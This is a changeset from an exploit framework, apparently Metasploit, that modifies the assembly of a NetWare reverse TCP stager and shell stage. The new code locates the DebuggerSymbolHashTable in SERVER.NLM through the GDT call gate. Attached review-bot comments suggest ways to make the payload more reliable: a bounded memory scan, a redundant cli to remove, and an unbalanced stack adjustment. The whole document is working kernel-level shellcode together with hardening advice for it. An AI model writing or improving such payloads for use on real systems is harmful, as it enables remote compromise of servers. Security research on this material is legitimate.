Changeset 5449
- Timestamp:
- 03/18/08 10:57:38 (5 months ago)
- Files:
framework3/trunk/modules/payloads/stagers/netware/reverse_tcp.rb
r5371 r5449 88 88 89 89 main_code: 90 ; search DebuggerSymbolHashTable pointer 90 ; search DebuggerSymbolHashTable pointer using GDT system call gate 91 ; -> points inside SERVER.NLM 91 92 cli 92 mov ebp, 0x300000 ; SERVER.NLM code 93 93 sub esp, 8 94 mov ecx, esp 95 sgdt [ecx] 96 97 cli 98 mov ebx, [ecx+2] 99 100 mov bp, word ptr [ebx+0x4E] 101 shl ebp, 16 102 mov bp, word ptr [ebx+0x48] 103 94 104 f_finddebugger: 95 cmp dword ptr[ebp], 0 x8110eac1105 cmp dword ptr[ebp], 0 96 106 jnz f_next 97 cmp dword ptr[ebp+4], 0x 0001ffe2107 cmp dword ptr[ebp+4], 0x808bc201 98 108 jz f_end 99 109 f_next: 100 inc ebp110 dec ebp 101 111 jmp f_finddebugger 102 112 f_end: 103 mov ebp, [ebp +0xc]113 mov ebp, [ebp-7] 104 114 105 115 ; resolve function pointers framework3/trunk/modules/payloads/stages/netware/shell.rb
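Review bot: The new `f_finddebugger` scan has no lower bound: starting from the call-gate offset it keeps doing `dec ebp` / `jmp f_finddebugger` until it finds a dword pair of `0` followed by `0x808bc201`, so on a SERVER.NLM build where that byte pattern is absent or laid out differently the loop walks down through memory until it faults at CPL0 with interrupts disabled, which takes the whole server down rather than just the payload. A bounded scan is cheap: load a limit into a free register before the loop (`mov ecx, SCAN_LIMIT`), then in `f_next` add `dec ecx` / `jz f_fail` and give `f_fail` a controlled exit (stage continues outside the hunk, so the exact exit path should be confirmed there). The signature and the `mov ebp, [ebp-7]` back-pointer are version-specific magic with no explanation; a comment such as `; 0x808bc201 = bytes of the code sequence following the DebuggerSymbolHashTable pointer; ptr sits 7 bytes before the match (verified on build X)` would let the next maintainer re-derive it when NetWare changes.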
r5371 r5449 94 94 stosd 95 95 96 ; search DebuggerSymbolHashTable pointer 96 ; search DebuggerSymbolHashTable pointer using GDT system call gate 97 ; -> points inside SERVER.NLM 97 98 cli 98 mov ebp, 0x300000 ; SERVER.NLM code 99 sub esp, 8 100 mov ecx, esp 101 sgdt [ecx] 102 103 cli 104 mov ebx, [ecx+2] 105 mov bp, word ptr [ebx+0x4E] 106 shl ebp, 16 107 mov bp, word ptr [ebx+0x48] 99 108 100 109 f_finddebugger: 101 cmp dword ptr[ebp], 0 x8110eac1110 cmp dword ptr[ebp], 0 102 111 jnz f_next 103 cmp dword ptr[ebp+4], 0x 0001ffe2112 cmp dword ptr[ebp+4], 0x808bc201 104 113 jz f_end 105 114 f_next: 106 inc ebp115 dec ebp 107 116 jmp f_finddebugger 108 117 f_end: 109 mov ebp, [ebp +0xc]118 mov ebp, [ebp-7] 110 119 111 120 ; resolve function pointers
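Review bot: The second `cli` added at new line 103 is redundant: interrupts are already cleared by the `cli` at line 98, and `sub`, `mov` and `sgdt` do not re-enable them, so either drop it or comment why it is needed. The hard-coded GDT offsets `0x48` and `0x4E` assume the NetWare system call gate always sits at selector 0x48 (GDT index 9) and read the gate's offset halves at +0 and +6; a comment stating that assumption, e.g. `; 0x48 = selector of the NetWare system-call gate; offset bits 15:0 at +0, 31:16 at +6 (call-gate layout)`, would make the dependency on a specific NetWare layout explicit. The `sub esp, 8` reserved for the 6-byte `sgdt` store is not balanced by an `add esp, 8` anywhere in the hunk; if the rest of the stage does not restore esp the stack drifts by 8 bytes, which should be confirmed outside the hunk.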
